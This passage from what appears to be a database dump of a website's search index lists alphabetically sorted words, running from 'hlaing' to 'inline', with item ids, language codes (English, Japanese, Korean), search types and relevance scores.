('hlaing', 173, 'en', 'node_search', 1),
('hlaing', 173, 'ja', 'node_search', 1),
('hmue', 146, 'en', 'node_search', 29),
('hmue', 146, 'ja', 'node_search', 1),
('hnin', 68, 'en', 'node_search', 4),
('hnin', 68, 'ja', 'node_search', 4),
('hnin', 73, 'en', 'node_search', 1),
('hnin', 73, 'ja', 'node_search', 1),
('hnin', 77, 'en', 'node_search', 5),
('hnin', 77, 'ja', 'node_search', 5),
('hnin', 91, 'en', 'node_search', 2),
('hnin', 91, 'ja', 'node_search', 2),
('hnin', 93, 'en', 'node_search', 2),
('hnin', 93, 'ja', 'node_search', 2),
('hnin', 97, 'en', 'node_search', 2),
('hnin', 97, 'ja', 'node_search', 2),
('hnin', 103, 'en', 'node_search', 2),
('hnin', 103, 'ja', 'node_search', 2),
('hnin', 105, 'en', 'node_search', 2),
('hnin', 105, 'ja', 'node_search', 2),
('hnin', 111, 'en', 'node_search', 2),
('hnin', 111, 'ja', 'node_search', 2),
('hnin', 134, 'en', 'node_search', 1),
('hnin', 134, 'ja', 'node_search', 1),
('hnin', 139, 'en', 'node_search', 28),
('hnin', 139, 'ja', 'node_search', 31),
('hnin', 143, 'en', 'node_search', 28),
('hnin', 143, 'ja', 'node_search', 31),
('hnin', 146, 'en', 'node_search', 29),
('hnin', 146, 'ja', 'node_search', 1),
('hnin', 157, 'en', 'node_search', 2),
('hnin', 157, 'ja', 'node_search', 2),
('hnin', 165, 'en', 'node_search', 1),
('hnin', 165, 'ja', 'node_search', 1),
('hnin', 173, 'en', 'node_search', 1),
('hnin', 173, 'ja', 'node_search', 1),
('hnin', 185, 'en', 'node_search', 3),
('hnin', 185, 'ja', 'node_search', 4.00925),
('hokkaido', 68, 'en', 'node_search', 5),
('hokkaido', 68, 'ja', 'node_search', 1),
('hokkaido', 78, 'en', 'node_search', 1),
('holders', 3, 'en', 'node_search', 1),
('holders', 3, 'ko', 'node_search', 1),
('holders', 162, 'en', 'node_search', 1),
('holds', 31, 'ja', 'help_search', 1),
('home', 3, 'en', 'node_search', 1),
('home', 3, 'ko', 'node_search', 1),
('home', 22, 'en', 'help_search', 1),
('home', 22, 'ja', 'help_search', 1),
('home', 22, 'ko', 'help_search', 1),
('home', 65, 'en', 'help_search', 1),
('home', 65, 'ja', 'help_search', 1),
('home', 65, 'ko', 'help_search', 1),
('home', 72, 'en', 'help_search', 0.993146),
('home', 72, 'ja', 'help_search', 0.993146),
('home', 72, 'ko', 'help_search', 0.993146),
('home', 77, 'en', 'help_search', 1),
('home', 77, 'ja', 'help_search', 1),
('home', 77, 'ko', 'help_search', 1),
('home', 162, 'en', 'node_search', 33),
('homes', 162, 'en', 'node_search', 1),
('homeworkas', 142, 'en', 'node_search', 1),
('honesty', 25, 'en', 'node_search', 1),
('hope', 167, 'en', 'node_search', 1),
('hope', 169, 'en', 'node_search', 1),
('hoping', 150, 'en', 'node_search', 1),
('horizontal', 28, 'en', 'help_search', 1),
('horizontal', 28, 'ja', 'help_search', 1),
('horizontal', 28, 'ko', 'help_search', 1),
('hose', 31, 'en', 'node_search', 1),
('hospitality', 155, 'en', 'node_search', 2),
('hospitality', 164, 'en', 'node_search', 1),
('hospitality', 166, 'en', 'node_search', 1),
('hospitality', 168, 'en', 'node_search', 5),
('hospitals', 27, 'en', 'node_search', 0.896076),
('hospitals', 162, 'en', 'node_search', 1),
('hostel', 5, 'en', 'node_search', 1),
('hostel', 5, 'ko', 'node_search', 1),
('hostess', 18, 'en', 'node_search', 28),
('hostess', 18, 'ko', 'node_search', 28),
('hotel', 24, 'en', 'node_search', 0.931053),
('hotel', 155, 'en', 'node_search', 36),
('hotel', 164, 'en', 'node_search', 29),
('hotel', 166, 'en', 'node_search', 33),
('hotel', 168, 'en', 'node_search', 30),
('hotels', 18, 'en', 'node_search', 28),
('hotels', 18, 'ko', 'node_search', 28),
('hotels', 155, 'en', 'node_search', 1),
('hour', 32, 'en', 'help_search', 1),
('hour', 32, 'ja', 'help_search', 1),
('hour', 32, 'ko', 'help_search', 1),
('hourly', 32, 'en', 'help_search', 1),
('hourly', 32, 'ja', 'help_search', 1),
('hourly', 32, 'ko', 'help_search', 1),
('hours', 5, 'en', 'node_search', 17),
('hours', 5, 'ko', 'node_search', 17),
('hours', 8, 'en', 'node_search', 2),
('hours', 31, 'en', 'node_search', 1),
('hours', 77, 'en', 'node_search', 4),
('hours', 87, 'en', 'node_search', 1),
('hours', 162, 'en', 'node_search', 0.938382),
('house', 24, 'en', 'node_search', 0.96498),
('housekeeping', 162, 'en', 'node_search', 1),
('housing', 11, 'en', 'node_search', 1),
('housing', 11, 'ja', 'node_search', 1),
('housing', 11, 'ko', 'node_search', 1),
('housing', 27, 'en', 'node_search', 5.76756),
('housing', 31, 'en', 'node_search', 0.839384),
('housing', 162, 'en', 'node_search', 0.968904),
('hovering', 22, 'en', 'help_search', 2),
('hovering', 22, 'ja', 'help_search', 2),
('hovering', 22, 'ko', 'help_search', 2),
('hovering', 23, 'en', 'help_search', 0.920273),
('hovering', 23, 'ja', 'help_search', 0.920273),
('hovering', 23, 'ko', 'help_search', 0.920273),
('hovers', 56, 'en', 'help_search', 1),
('hovers', 56, 'ja', 'help_search', 1),
('hovers', 56, 'ko', 'help_search', 1),
('how', 8, 'en', 'help_search', 1),
('how', 8, 'ja', 'help_search', 1),
('how', 8, 'ko', 'help_search', 1),
('how', 11, 'en', 'help_search', 1),
('how', 11, 'ja', 'help_search', 1),
('how', 11, 'ko', 'help_search', 1),
('how', 28, 'en', 'node_search', 1),
('how', 30, 'en', 'help_search', 1),
('how', 30, 'ja', 'help_search', 1),
('how', 30, 'ko', 'help_search', 1),
('how', 31, 'en', 'node_search', 1),
('how', 31, 'ja', 'help_search', 3.29815),
('how', 32, 'en', 'help_search', 1),
('how', 32, 'ja', 'help_search', 1),
('how', 32, 'ko', 'help_search', 1),
('how', 40, 'en', 'help_search', 1),
('how', 40, 'ja', 'help_search', 1),
('how', 40, 'ko', 'help_search', 1),
('how', 45, 'en', 'help_search', 1),
('how', 45, 'ja', 'help_search', 1),
('how', 45, 'ko', 'help_search', 1),
('how', 46, 'en', 'help_search', 57),
('how', 46, 'ja', 'help_search', 57),
('how', 46, 'ko', 'help_search', 57),
('how', 60, 'en', 'help_search', 1),
('how', 60, 'ja', 'help_search', 1),
('how', 60, 'ko', 'help_search', 1),
('how', 76, 'en', 'help_search', 1),
('how', 76, 'ja', 'help_search', 1),
('how', 76, 'ko', 'help_search', 1),
('how', 79, 'en', 'help_search', 1),
('how', 79, 'ja', 'help_search', 1),
('how', 79, 'ko', 'help_search', 1),
('how', 80, 'en', 'help_search', 1),
('how', 80, 'ja', 'help_search', 1),
('how', 80, 'ko', 'help_search', 1),
('how', 86, 'en', 'help_search', 27),
('how', 86, 'ja', 'help_search', 27),
('how', 86, 'ko', 'help_search', 27),
('how', 90, 'en', 'help_search', 1),
('how', 90, 'ja', 'help_search', 1),
('how', 90, 'ko', 'help_search', 1),
('how', 91, 'en', 'help_search', 1),
('how', 91, 'ja', 'help_search', 1),
('how', 91, 'ko', 'help_search', 1),
('how', 93, 'en', 'help_search', 4.74727),
('how', 93, 'ja', 'help_search', 4.74727),
('how', 93, 'ko', 'help_search', 4.74727),
('however', 42, 'en', 'help_search', 1),
('however', 42, 'ja', 'help_search', 1),
('however', 42, 'ko', 'help_search', 1),
('however', 69, 'en', 'help_search', 1),
('however', 69, 'ja', 'help_search', 1),
('however', 69, 'ko', 'help_search', 1),
('hpone', 130, 'en', 'node_search', 1),
('hpone', 130, 'ja', 'node_search', 1),
('hpone', 153, 'en', 'node_search', 1),
('hpone', 153, 'ja', 'node_search', 1),
('hsu', 146, 'en', 'node_search', 33),
('hsu', 146, 'ja', 'node_search', 2),
('hsu', 149, 'en', 'node_search', 1),
('hsu', 165, 'en', 'node_search', 1),
('hsu', 165, 'ja', 'node_search', 1),
('hsu', 173, 'en', 'node_search', 1),
('hsu', 173, 'ja', 'node_search', 1),
('hsu', 180, 'en', 'node_search', 3),
('hsu', 180, 'ja', 'node_search', 1.80007),
('htar', 146, 'en', 'node_search', 29),
('htar', 146, 'ja', 'node_search', 1),
('htay', 167, 'en', 'node_search', 2),
('htay', 167, 'ja', 'node_search', 2),
('htet', 108, 'en', 'node_search', 2),
('htet', 108, 'ja', 'node_search', 2),
('htet', 113, 'en', 'node_search', 2),
('htet', 113, 'ja', 'node_search', 2),
('htet', 130, 'en', 'node_search', 1),
('htet', 130, 'ja', 'node_search', 1),
('htet', 144, 'en', 'node_search', 31),
('htet', 144, 'ja', 'node_search', 31),
('htet', 153, 'en', 'node_search', 1),
('htet', 153, 'ja', 'node_search', 1),
('htet', 165, 'en', 'node_search', 1),
('htet', 165, 'ja', 'node_search', 1),
('htet', 168, 'en', 'node_search', 4),
('htet', 168, 'ja', 'node_search', 3.51893),
('htet', 178, 'en', 'node_search', 2),
('htet', 178, 'ja', 'node_search', 1.78178),
('htike', 128, 'en', 'node_search', 31),
('htike', 128, 'ja', 'node_search', 31),
('htike', 151, 'en', 'node_search', 1),
('htike', 151, 'ja', 'node_search', 1),
('htike', 152, 'en', 'node_search', 1),
('htike', 152, 'ja', 'node_search', 1),
('html', 11, 'en', 'help_search', 1),
('html', 11, 'ja', 'help_search', 1),
('html', 11, 'ko', 'help_search', 1),
('html', 23, 'en', 'help_search', 4),
('html', 23, 'ja', 'help_search', 4),
('html', 23, 'ko', 'help_search', 4),
('html', 25, 'ja', 'help_search', 1),
('html', 28, 'en', 'help_search', 12.3934),
('html', 28, 'ja', 'help_search', 12.3934),
('html', 28, 'ko', 'help_search', 12.3934),
('html', 29, 'en', 'help_search', 2),
('html', 29, 'ja', 'help_search', 2),
('html', 29, 'ko', 'help_search', 2),
('html', 31, 'ja', 'help_search', 2.44132),
('html', 37, 'en', 'help_search', 1),
('html', 37, 'ja', 'help_search', 1),
('html', 37, 'ko', 'help_search', 1),
('html', 62, 'en', 'help_search', 1),
('html', 62, 'ja', 'help_search', 1),
('html', 62, 'ko', 'help_search', 1),
('html', 93, 'en', 'help_search', 1),
('html', 93, 'ja', 'help_search', 1),
('html', 93, 'ko', 'help_search', 1),
('http', 44, 'en', 'help_search', 44),
('http', 44, 'ja', 'help_search', 44),
('http', 44, 'ko', 'help_search', 44),
('https', 63, 'en', 'help_search', 4),
('https', 63, 'ja', 'help_search', 4),
('https', 63, 'ko', 'help_search', 4),
('https', 65, 'en', 'help_search', 12),
('https', 65, 'ja', 'help_search', 12),
('https', 65, 'ko', 'help_search', 12),
('https', 72, 'en', 'help_search', 7.84712),
('https', 72, 'ja', 'help_search', 7.84712),
('https', 72, 'ko', 'help_search', 7.84712),
('htun', 108, 'en', 'node_search', 2),
('htun', 108, 'ja', 'node_search', 2),
('htun', 113, 'en', 'node_search', 2),
('htun', 113, 'ja', 'node_search', 2),
('htun', 125, 'en', 'node_search', 28),
('htun', 125, 'ja', 'node_search', 31),
('htun', 144, 'en', 'node_search', 31),
('htun', 144, 'ja', 'node_search', 31),
('htwe', 127, 'en', 'node_search', 28),
('htwe', 127, 'ja', 'node_search', 31),
('htwe', 167, 'en', 'node_search', 1),
('htwe', 167, 'ja', 'node_search', 1),
('htwe', 199, 'en', 'node_search', 6),
('htwe', 199, 'ja', 'node_search', 4.01872),
('human', 25, 'en', 'node_search', 1),
('human', 63, 'en', 'help_search', 1),
('human', 63, 'ja', 'help_search', 1),
('human', 63, 'ko', 'help_search', 1),
('humanreadable', 30, 'en', 'help_search', 0.989021),
('humanreadable', 30, 'ja', 'help_search', 0.989021),
('humanreadable', 30, 'ko', 'help_search', 0.989021),
('ibaraki', 163, 'en', 'node_search', 2),
('icon', 38, 'en', 'help_search', 1),
('icon', 38, 'ja', 'help_search', 1),
('icon', 38, 'ko', 'help_search', 1),
('icon', 39, 'en', 'help_search', 1),
('icon', 39, 'ja', 'help_search', 1),
('icon', 39, 'ko', 'help_search', 1),
('icon', 80, 'en', 'help_search', 1),
('icon', 80, 'ja', 'help_search', 1),
('icon', 80, 'ko', 'help_search', 1),
('ideas', 87, 'en', 'node_search', 2),
('identification', 2, 'en', 'help_search', 1),
('identification', 2, 'ja', 'help_search', 1),
('identification', 2, 'ko', 'help_search', 1),
('identifier', 23, 'en', 'help_search', 3.49253),
('identifier', 23, 'ja', 'help_search', 3.49253),
('identifier', 23, 'ko', 'help_search', 3.49253),
('identifier', 30, 'en', 'help_search', 0.892724),
('identifier', 30, 'ja', 'help_search', 0.892724),
('identifier', 30, 'ko', 'help_search', 0.892724),
('identifiers', 23, 'en', 'help_search', 0.876337),
('identifiers', 23, 'ja', 'help_search', 0.876337),
('identifiers', 23, 'ko', 'help_search', 0.876337),
('identifies', 30, 'en', 'help_search', 0.879565),
('identifies', 30, 'ja', 'help_search', 0.879565),
('identifies', 30, 'ko', 'help_search', 0.879565),
('identifies', 65, 'en', 'help_search', 1),
('identifies', 65, 'ja', 'help_search', 1),
('identifies', 65, 'ko', 'help_search', 1),
('image', 6, 'en', 'help_search', 0.989021),
('image', 6, 'ja', 'help_search', 0.989021),
('image', 6, 'ko', 'help_search', 0.989021),
('image', 28, 'en', 'help_search', 1),
('image', 28, 'ja', 'help_search', 1),
('image', 28, 'ko', 'help_search', 1),
('image', 30, 'en', 'help_search', 2),
('image', 30, 'ja', 'help_search', 2),
('image', 30, 'ko', 'help_search', 2),
('image', 35, 'en', 'help_search', 26.9919),
('image', 35, 'ja', 'help_search', 26.9919),
('image', 35, 'ko', 'help_search', 26.9919),
('image', 48, 'en', 'help_search', 41),
('image', 48, 'ja', 'help_search', 41),
('image', 48, 'ko', 'help_search', 41),
('image', 80, 'en', 'help_search', 1),
('image', 80, 'ja', 'help_search', 1),
('image', 80, 'ko', 'help_search', 1),
('images', 6, 'en', 'help_search', 1),
('images', 6, 'ja', 'help_search', 1),
('images', 6, 'ko', 'help_search', 1),
('images', 17, 'en', 'help_search', 1),
('images', 17, 'ja', 'help_search', 1),
('images', 17, 'ko', 'help_search', 1),
('images', 28, 'en', 'help_search', 1.99731),
('images', 28, 'ja', 'help_search', 1.99731),
('images', 28, 'ko', 'help_search', 1.99731),
('images', 29, 'en', 'help_search', 1),
('images', 29, 'ja', 'help_search', 1),
('images', 29, 'ko', 'help_search', 1),
('images', 31, 'ja', 'help_search', 3),
('images', 35, 'en', 'help_search', 4.98087),
('images', 35, 'ja', 'help_search', 4.98087),
('images', 35, 'ko', 'help_search', 4.98087),
('images', 48, 'en', 'help_search', 1),
('images', 48, 'ja', 'help_search', 1),
('images', 48, 'ko', 'help_search', 1),
('images', 62, 'en', 'help_search', 1),
('images', 62, 'ja', 'help_search', 1),
('images', 62, 'ko', 'help_search', 1),
('images', 95, 'en', 'node_search', 1),
('images', 98, 'en', 'node_search', 1),
('images', 116, 'en', 'node_search', 46),
('images', 116, 'ja', 'node_search', 27),
('immediately', 59, 'en', 'help_search', 1),
('immediately', 59, 'ja', 'help_search', 1),
('immediately', 59, 'ko', 'help_search', 1),
('immense', 67, 'ja', 'node_search', 1),
('immerse', 67, 'ja', 'node_search', 1),
('impact', 76, 'en', 'help_search', 1),
('impact', 76, 'ja', 'help_search', 1),
('impact', 76, 'ko', 'help_search', 1),
('impact', 178, 'en', 'node_search', 1),
('impart', 133, 'en', 'node_search', 1),
('implementation', 44, 'en', 'help_search', 2),
('implementation', 44, 'ja', 'help_search', 2),
('implementation', 44, 'ko', 'help_search', 2),
('implemented', 42, 'en', 'help_search', 0.989021),
('implemented', 42, 'ja', 'help_search', 0.989021),
('implemented', 42, 'ko', 'help_search', 0.989021),
('implications', 38, 'en', 'help_search', 1),
('implications', 38, 'ja', 'help_search', 1),
('implications', 38, 'ko', 'help_search', 1),
('implications', 85, 'en', 'help_search', 4),
('implications', 85, 'ja', 'help_search', 4),
('implications', 85, 'ko', 'help_search', 4),
('import', 14, 'en', 'help_search', 11),
('import', 14, 'ja', 'help_search', 11),
('import', 14, 'ko', 'help_search', 11),
('import', 15, 'en', 'help_search', 11),
('import', 15, 'ja', 'help_search', 11),
('import', 15, 'ko', 'help_search', 11),
('import', 23, 'en', 'node_search', 1),
('import', 27, 'en', 'node_search', 2.27339),
('import', 51, 'en', 'help_search', 8),
('import', 51, 'ja', 'help_search', 8),
('import', 51, 'ko', 'help_search', 8),
('importance', 122, 'en', 'node_search', 1),
('importance', 179, 'en', 'node_search', 1),
('important', 3, 'en', 'node_search', 1.96498),
('important', 3, 'ko', 'node_search', 1.95723),
('important', 161, 'en', 'node_search', 1),
('important', 164, 'en', 'node_search', 1),
('important', 165, 'en', 'node_search', 1),
('important', 166, 'en', 'node_search', 1),
('important', 169, 'en', 'node_search', 1),
('important', 171, 'en', 'node_search', 1),
('important', 173, 'en', 'node_search', 1),
('important', 174, 'en', 'node_search', 1),
('important', 175, 'en', 'node_search', 1),
('important', 176, 'en', 'node_search', 1),
('important', 177, 'en', 'node_search', 1),
('important', 178, 'en', 'node_search', 1),
('important', 180, 'en', 'node_search', 1),
('important', 181, 'en', 'node_search', 1),
('important', 183, 'en', 'node_search', 1),
('important', 184, 'en', 'node_search', 1),
('important', 185, 'en', 'node_search', 1),
('important', 187, 'en', 'node_search', 1),
('important', 188, 'en', 'node_search', 1),
('important', 191, 'en', 'node_search', 1),
('important', 192, 'en', 'node_search', 1),
('important', 193, 'en', 'node_search', 1),
('important', 195, 'en', 'node_search', 1),
('important', 196, 'en', 'node_search', 1),
('important', 197, 'en', 'node_search', 1),
('important', 198, 'en', 'node_search', 2),
('important', 199, 'en', 'node_search', 1),
('importation', 27, 'en', 'node_search', 1.99153),
('imported', 30, 'en', 'help_search', 5.90265),
('imported', 30, 'ja', 'help_search', 5.90265),
('imported', 30, 'ko', 'help_search', 5.90265),
('imported', 51, 'en', 'help_search', 1),
('imported', 51, 'ja', 'help_search', 1),
('imported', 51, 'ko', 'help_search', 1),
('importing', 14, 'en', 'help_search', 26),
('importing', 14, 'ja', 'help_search', 26),
('importing', 14, 'ko', 'help_search', 26),
('importing', 15, 'en', 'help_search', 26),
('importing', 15, 'ja', 'help_search', 26),
('importing', 15, 'ko', 'help_search', 26),
('importing', 23, 'en', 'node_search', 1),
('importing', 30, 'en', 'help_search', 1.64815),
('importing', 30, 'ja', 'help_search', 1.64815),
('importing', 30, 'ko', 'help_search', 1.64815),
('importing', 51, 'en', 'help_search', 26),
('importing', 51, 'ja', 'help_search', 26),
('importing', 51, 'ko', 'help_search', 26),
('improper', 28, 'en', 'help_search', 3.45463),
('improper', 28, 'ja', 'help_search', 3.45463),
('improper', 28, 'ko', 'help_search', 3.45463),
('improve', 37, 'en', 'help_search', 20),
('improve', 37, 'ja', 'help_search', 20),
('improve', 37, 'ko', 'help_search', 20),
('improve', 68, 'en', 'help_search', 1),
('improve', 68, 'ja', 'help_search', 1),
('improve', 68, 'ko', 'help_search', 1),
('improve', 87, 'en', 'node_search', 1),
('improved', 42, 'en', 'help_search', 1),
('improved', 42, 'ja', 'help_search', 1),
('improved', 42, 'ko', 'help_search', 1),
('improved', 182, 'en', 'node_search', 1),
('improving', 181, 'en', 'node_search', 1),
('inaugural', 133, 'en', 'node_search', 1),
('include', 35, 'en', 'help_search', 2),
('include', 35, 'ja', 'help_search', 2),
('include', 35, 'ko', 'help_search', 2),
('include', 37, 'en', 'help_search', 1),
('include', 37, 'ja', 'help_search', 1),
('include', 37, 'ko', 'help_search', 1),
('include', 41, 'en', 'help_search', 1),
('include', 41, 'ja', 'help_search', 1),
('include', 41, 'ko', 'help_search', 1),
('include', 42, 'en', 'help_search', 1),
('include', 42, 'ja', 'help_search', 1),
('include', 42, 'ko', 'help_search', 1),
('include', 93, 'en', 'help_search', 0.857458),
('include', 93, 'ja', 'help_search', 0.857458),
('include', 93, 'ko', 'help_search', 0.857458),
('included', 155, 'en', 'node_search', 2),
('includes', 66, 'en', 'node_search', 2),
('includes', 68, 'en', 'help_search', 1),
('includes', 68, 'ja', 'help_search', 1),
('includes', 68, 'ko', 'help_search', 1),
('includes', 76, 'en', 'help_search', 1),
('includes', 76, 'ja', 'help_search', 1),
('includes', 76, 'ko', 'help_search', 1),
('including', 18, 'en', 'help_search', 1),
('including', 18, 'ja', 'help_search', 1),
('including', 18, 'ko', 'help_search', 1),
('including', 29, 'en', 'help_search', 1),
('including', 29, 'ja', 'help_search', 1),
('including', 29, 'ko', 'help_search', 1),
('including', 36, 'en', 'help_search', 1),
('including', 36, 'ja', 'help_search', 1),
('including', 36, 'ko', 'help_search', 1),
('including', 42, 'en', 'help_search', 1),
('including', 42, 'ja', 'help_search', 1),
('including', 42, 'ko', 'help_search', 1),
('including', 43, 'en', 'help_search', 0.923838),
('including', 43, 'ja', 'help_search', 0.923838),
('including', 43, 'ko', 'help_search', 0.923838),
('including', 46, 'en', 'help_search', 2),
('including', 46, 'ja', 'help_search', 2),
('including', 46, 'ko', 'help_search', 2),
('including', 66, 'en', 'node_search', 1),
('including', 71, 'en', 'help_search', 1),
('including', 71, 'ja', 'help_search', 1),
('including', 71, 'ko', 'help_search', 1),
('including', 72, 'en', 'help_search', 27),
('including', 72, 'ja', 'help_search', 27),
('including', 72, 'ko', 'help_search', 27),
('including', 80, 'en', 'help_search', 0.923838),
('including', 80, 'ja', 'help_search', 0.923838),
('including', 80, 'ko', 'help_search', 0.923838),
('including', 87, 'en', 'help_search', 1),
('including', 87, 'ja', 'help_search', 1),
('including', 87, 'ko', 'help_search', 1),
('including', 162, 'en', 'node_search', 0.980874),
('income', 8, 'en', 'node_search', 2),
('income', 31, 'en', 'node_search', 1),
('income', 162, 'en', 'node_search', 0.997306),
('incorrect', 72, 'en', 'help_search', 1),
('incorrect', 72, 'ja', 'help_search', 1),
('incorrect', 72, 'ko', 'help_search', 1),
('increasing', 42, 'en', 'help_search', 1),
('increasing', 42, 'ja', 'help_search', 1),
('increasing', 42, 'ko', 'help_search', 1),
('indemand', 155, 'en', 'node_search', 1),
('independently', 142, 'en', 'node_search', 1),
('index', 45, 'en', 'help_search', 4),
('index', 45, 'ja', 'help_search', 4),
('index', 45, 'ko', 'help_search', 4),
('index', 66, 'en', 'help_search', 2),
('index', 66, 'ja', 'help_search', 2),
('index', 67, 'en', 'help_search', 58.9274),
('index', 67, 'ja', 'help_search', 58.9274),
('index', 67, 'ko', 'help_search', 58.9274),
('index', 68, 'en', 'help_search', 0.830633),
('index', 68, 'ja', 'help_search', 0.830633),
('index', 68, 'ko', 'help_search', 0.830633),
('indexed', 45, 'en', 'help_search', 1),
('indexed', 45, 'ja', 'help_search', 1),
('indexed', 45, 'ko', 'help_search', 1),
('indexed', 67, 'en', 'help_search', 2.89272),
('indexed', 67, 'ja', 'help_search', 2.89272),
('indexed', 67, 'ko', 'help_search', 2.89272),
('indexed', 68, 'en', 'help_search', 0.824901),
('indexed', 68, 'ja', 'help_search', 0.824901),
('indexed', 68, 'ko', 'help_search', 0.824901),
('indexing', 45, 'en', 'help_search', 2),
('indexing', 45, 'ja', 'help_search', 2),
('indexing', 45, 'ko', 'help_search', 2),
('indexing', 67, 'en', 'help_search', 22.8982),
('indexing', 67, 'ja', 'help_search', 22.8982),
('indexing', 67, 'ko', 'help_search', 22.8982),
('indicating', 71, 'en', 'help_search', 3),
('indicating', 71, 'ja', 'help_search', 3),
('indicating', 71, 'ko', 'help_search', 3),
('indicating', 72, 'en', 'help_search', 1.85285),
('indicating', 72, 'ja', 'help_search', 1.85285),
('indicating', 72, 'ko', 'help_search', 1.85285),
('indicating', 86, 'en', 'help_search', 0.957226),
('indicating', 86, 'ja', 'help_search', 0.957226),
('indicating', 86, 'ko', 'help_search', 0.957226),
('individual', 7, 'en', 'help_search', 0.938382),
('individual', 7, 'ja', 'help_search', 0.938382),
('individual', 7, 'ko', 'help_search', 0.938382),
('individual', 29, 'en', 'help_search', 1),
('individual', 29, 'ja', 'help_search', 1),
('individual', 29, 'ko', 'help_search', 1),
('individual', 31, 'ja', 'help_search', 1),
('individual', 80, 'en', 'help_search', 2),
('individual', 80, 'ja', 'help_search', 2),
('individual', 80, 'ko', 'help_search', 2),
('individual', 86, 'en', 'help_search', 1),
('individual', 86, 'ja', 'help_search', 1),
('individual', 86, 'ko', 'help_search', 1),
('individual', 91, 'en', 'help_search', 1),
('individual', 91, 'ja', 'help_search', 1),
('individual', 91, 'ko', 'help_search', 1),
('individuals', 66, 'en', 'node_search', 1),
('individuals', 155, 'en', 'node_search', 1),
('individuals', 162, 'en', 'node_search', 1),
('individuals', 185, 'en', 'node_search', 1),
('individuals', 187, 'en', 'node_search', 1),
('individuals', 188, 'en', 'node_search', 1),
('industrial', 24, 'en', 'node_search', 0.968904),
('industrial', 27, 'en', 'node_search', 2.62203),
('industries', 24, 'en', 'node_search', 1.87723),
('industries', 155, 'en', 'node_search', 1),
('industry', 18, 'en', 'node_search', 1),
('industry', 18, 'ko', 'node_search', 1),
('industry', 27, 'en', 'node_search', 0.705825),
('industry', 155, 'en', 'node_search', 2),
('industry', 156, 'en', 'node_search', 29),
('industry', 157, 'en', 'node_search', 29),
('industry', 161, 'en', 'node_search', 1),
('industry', 164, 'en', 'node_search', 1),
('industry', 166, 'en', 'node_search', 2),
('industry', 167, 'en', 'node_search', 1),
('industry', 168, 'en', 'node_search', 1),
('industry', 170, 'en', 'node_search', 1),
('industry', 173, 'en', 'node_search', 1),
('industry', 174, 'en', 'node_search', 28),
('industry', 175, 'en', 'node_search', 28),
('industry', 176, 'en', 'node_search', 1),
('industry', 177, 'en', 'node_search', 1),
('industry', 184, 'en', 'node_search', 1),
('industry', 186, 'en', 'node_search', 1),
('industry', 187, 'en', 'node_search', 1),
('industry', 190, 'en', 'node_search', 1),
('industry', 192, 'en', 'node_search', 1),
('industry', 193, 'en', 'node_search', 1),
('industry', 194, 'en', 'node_search', 1),
('industry', 195, 'en', 'node_search', 1),
('industry', 196, 'en', 'node_search', 1),
('industry', 199, 'en', 'node_search', 1),
('influence', 66, 'en', 'help_search', 1),
('influence', 66, 'ja', 'help_search', 1),
('information', 4, 'ko', 'node_search', 27),
('information', 6, 'en', 'help_search', 2),
('information', 6, 'ja', 'help_search', 2),
('information', 6, 'ko', 'help_search', 2),
('information', 7, 'en', 'help_search', 1),
('information', 7, 'ja', 'help_search', 1),
('information', 7, 'ko', 'help_search', 1),
('information', 8, 'en', 'help_search', 1),
('information', 8, 'ja', 'help_search', 1),
('information', 8, 'ko', 'help_search', 1),
('information', 12, 'en', 'help_search', 1),
('information', 12, 'ja', 'help_search', 1),
('information', 12, 'ko', 'help_search', 1),
('information', 13, 'en', 'help_search', 1),
('information', 13, 'ja', 'help_search', 1),
('information', 13, 'ko', 'help_search', 1),
('information', 14, 'en', 'help_search', 1),
('information', 14, 'ja', 'help_search', 1),
('information', 14, 'ko', 'help_search', 1),
('information', 15, 'en', 'help_search', 1),
('information', 15, 'ja', 'help_search', 1),
('information', 15, 'ko', 'help_search', 1),
('information', 18, 'en', 'help_search', 4),
('information', 18, 'ja', 'help_search', 4),
('information', 18, 'ko', 'help_search', 4),
('information', 25, 'en', 'help_search', 1),
('information', 25, 'ja', 'help_search', 1),
('information', 26, 'en', 'help_search', 1),
('information', 26, 'ja', 'help_search', 1),
('information', 26, 'ko', 'help_search', 1),
('information', 27, 'en', 'help_search', 1),
('information', 27, 'ja', 'help_search', 1),
('information', 27, 'ko', 'help_search', 1),
('information', 31, 'ja', 'help_search', 3.70583),
('information', 34, 'en', 'help_search', 1),
('information', 34, 'ja', 'help_search', 1),
('information', 34, 'ko', 'help_search', 1),
('information', 35, 'en', 'help_search', 1),
('information', 35, 'ja', 'help_search', 1),
('information', 35, 'ko', 'help_search', 1),
('information', 43, 'en', 'help_search', 2.90286),
('information', 43, 'ja', 'help_search', 2.90286),
('information', 43, 'ko', 'help_search', 2.90286),
('information', 44, 'en', 'help_search', 1),
('information', 44, 'ja', 'help_search', 1),
('information', 44, 'ko', 'help_search', 1),
('information', 47, 'en', 'help_search', 19),
('information', 47, 'ja', 'help_search', 19),
('information', 47, 'ko', 'help_search', 19),
('information', 48, 'en', 'help_search', 1),
('information', 48, 'ja', 'help_search', 1),
('information', 48, 'ko', 'help_search', 1),
('information', 54, 'en', 'help_search', 5),
('information', 54, 'ja', 'help_search', 5),
('information', 54, 'ko', 'help_search', 5),
('information', 67, 'en', 'help_search', 1),
('information', 67, 'ja', 'help_search', 1),
('information', 67, 'ko', 'help_search', 1),
('information', 68, 'en', 'help_search', 4.47836),
('information', 68, 'ja', 'help_search', 4.47836),
('information', 68, 'ko', 'help_search', 4.47836),
('information', 74, 'en', 'help_search', 1),
('information', 74, 'ja', 'help_search', 1),
('information', 74, 'ko', 'help_search', 1),
('information', 76, 'en', 'help_search', 1),
('information', 76, 'ja', 'help_search', 1),
('information', 76, 'ko', 'help_search', 1),
('information', 79, 'en', 'help_search', 1),
('information', 79, 'ja', 'help_search', 1),
('information', 79, 'ko', 'help_search', 1),
('information', 89, 'en', 'help_search', 1),
('information', 89, 'ja', 'help_search', 1),
('information', 89, 'ko', 'help_search', 1),
('information', 91, 'en', 'help_search', 1),
('information', 91, 'ja', 'help_search', 1),
('information', 91, 'ko', 'help_search', 1),
('information', 155, 'en', 'node_search', 5),
('information', 162, 'en', 'node_search', 0.860547),
('informational', 76, 'en', 'help_search', 1),
('informational', 76, 'ja', 'help_search', 1),
('informational', 76, 'ko', 'help_search', 1),
('ingredients', 79, 'en', 'help_search', 1),
('ingredients', 79, 'ja', 'help_search', 1),
('ingredients', 79, 'ko', 'help_search', 1),
('ingredients', 80, 'en', 'help_search', 4),
('ingredients', 80, 'ja', 'help_search', 4),
('ingredients', 80, 'ko', 'help_search', 4),
('ingredients', 122, 'en', 'node_search', 1),
('inline', 39, 'en', 'help_search', 27),
